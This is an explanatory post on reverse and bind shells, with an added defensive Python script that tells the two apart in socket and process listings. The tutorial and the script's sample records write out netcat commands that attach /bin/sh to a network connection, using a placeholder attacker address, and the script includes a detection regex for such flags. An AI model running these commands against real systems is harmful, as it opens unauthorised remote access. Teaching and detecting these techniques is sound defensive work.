There are two types (perhaps more?) of shells that we attempt to establish when hacking a target: the reverse shell and the bind shell.
The reverse shell is the most common type of shell found in the wild. This type of shell goes like this:
- We open a port locally, such as `nc -lvp 4444`
- We "pop" a remote host and get it to execute `nc $ourIP 4444 -e /bin/sh`
This results in the remote system talking back to our port on 4444, giving us a shell on the remote system.
This type of shell is a "reverse" shell because the remote system is establishing the shell by talking to us. Normally you'd establish the connection from your local system, but the reverse shell literally reverses this logic.
Here's a dorky diagram I drew to illustrate the above.
The bind shell is almost like a traditional connection - the remote server offers a network service on a port and you connect to it. This is how SSH operates.
The primary difference between the two shell types is that a reverse shell connects back to us, which requires our networking infrastructure to let the connection in, while a bind shell opens or "binds" to a port on the remote host that we then connect to, which requires the remote side to accept an inbound connection on that port.
A bind shell goes like this:
- We pop a remote host and start a shell on it, bound to a port: `nc -lvp 4444 -e /bin/sh`
- We connect to the remote shell (`nc $remoteIP 4444`) and then take advantage of the access to elevate our privileges
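From the defender's side, the two shell types look different in a host's socket table: a bind shell shows up as a listener whose process hands the socket to a shell, a reverse shell as an outbound connection from an ephemeral port with the same shell-exec flag. The classifier below is an added example, not part of the original post; it runs over constructed records shaped like `ss -tnp` and `ps -o pid,args` output (the pids, addresses and command lines are made up for illustration).

```python
import re
from collections import namedtuple

# Constructed sample records shaped like `ss -tnp` output (not captured from a
# real host): state, recv-q, send-q, local addr:port, peer addr:port, process.
SAMPLE_SOCKETS = [
    'LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=812,fd=3))',
    'LISTEN 0 1 0.0.0.0:4444 0.0.0.0:* users:(("nc",pid=2311,fd=3))',
    'ESTAB 0 0 10.0.0.5:4444 203.0.113.9:40222 users:(("nc",pid=2311,fd=4))',
    'ESTAB 0 0 10.0.0.5:51522 203.0.113.9:4444 users:(("nc",pid=2402,fd=3))',
    'ESTAB 0 0 10.0.0.5:51600 203.0.113.9:443 users:(("curl",pid=2500,fd=5))',
]
# Constructed command lines keyed by pid, as `ps -o pid,args` would show them.
SAMPLE_CMDLINES = {
    812: "/usr/sbin/sshd -D",
    2311: "nc -lvp 4444 -e /bin/sh",
    2402: "nc 203.0.113.9 4444 -e /bin/sh",
    2500: "curl https://example.com/",
}

SOCKET_RE = re.compile(
    r'^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)'
    r'\s+users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)')
# netcat variants hand the socket to a shell via -e / -c / --exec.
SHELL_EXEC_RE = re.compile(r'(?:^|\s)(?:-e|-c|--exec)\s+(?:/\S*/)?(?:ba|da)?sh\b')

Finding = namedtuple("Finding", "pid proc kind peer")

def classify(socket_lines, cmdlines):
    """Label sockets whose owning process pipes a shell over the network.

    LISTEN + shell-exec flag   -> bind shell (port offered, peer connects in)
    ESTAB on a listening port  -> an accepted session on that bind shell
    ESTAB on an ephemeral port -> reverse shell (this host connected out)
    """
    parsed = [m.groupdict() for m in map(SOCKET_RE.match, socket_lines) if m]
    listening_ports = {p["local"].rsplit(":", 1)[1]
                       for p in parsed if p["state"] == "LISTEN"}
    findings = []
    for p in parsed:
        pid = int(p["pid"])
        if not SHELL_EXEC_RE.search(cmdlines.get(pid, "")):
            continue  # ordinary network process such as sshd or curl
        local_port = p["local"].rsplit(":", 1)[1]
        if p["state"] == "LISTEN" or local_port in listening_ports:
            kind = "bind shell"
        else:
            kind = "reverse shell"
        findings.append(Finding(pid, p["proc"], kind, p["peer"]))
    return findings

if __name__ == "__main__":
    for f in classify(SAMPLE_SOCKETS, SAMPLE_CMDLINES):
        print(f"pid {f.pid} ({f.proc}): {f.kind}, peer {f.peer}")
```

The direction check is what matters: a listener with a shell attached can only be a bind shell, whereas an outbound connection from a high port with the same flag is the "connect back to us" pattern described above.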